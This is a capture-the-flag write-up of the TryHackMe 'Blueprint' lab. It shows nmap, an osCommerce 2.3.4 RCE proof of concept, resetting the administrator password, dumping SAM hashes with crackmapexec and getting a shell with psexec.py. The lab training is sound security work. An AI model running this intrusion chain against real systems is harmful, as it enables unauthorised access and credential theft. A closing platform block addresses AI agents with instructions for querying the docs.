> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/windows/blueprint.md). # Blueprint ## Nmap ``` sudo nmap 10.10.153.99 -sV -sS PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Starting out we check port 8080 and find that a web server is running. The root page presents us with an index page where we see the commerce system oscommerce 2.3.4 is installed. ![](/files/PWGjETTixhRfdoYx7J2b) A simple preliminary check with `searchsploit` shows multiple vulnerabilities with this version. ``` searchsploit oscommerce 2.3.4 -w ``` ![](/files/mO05Ue6dpTv917TBpAUf) Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648. GitHub: Which has the following definition for the exploit: *"Exploiting the install.php finish process by injecting php payload into the db\_database parameter & read the system command output from configure.php"*. Using the example provided on GitHub we clone the repo and run with the following syntax: ``` python3 exploit.py http:///oscommerce-2.3.4/catalog/ ``` ![](/files/o3j1dVW266mGyKiiaamz) After gaining a SYSTEM level shell on the target system we now aim to gain a proper reverse shell. As well as dump the hashes from the target system. With SYSTEM access we change the local administrator password. ``` net user administrator Password123 ``` Then use `crackmapexec` to dump the NTLM hashes from the SAM file. ```bash crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam ``` ![](/files/TaeeJ0B0ioESPKeYTmRq) After dumping hashes from SAM we then use `psexec.py` to gain shell access to the target system. ``` psexec.py ./administrator:'Password123'@'10.10.153.99' ``` ![](/files/fvALr94bFzAzU3tkxRQk) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/windows/blueprint.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.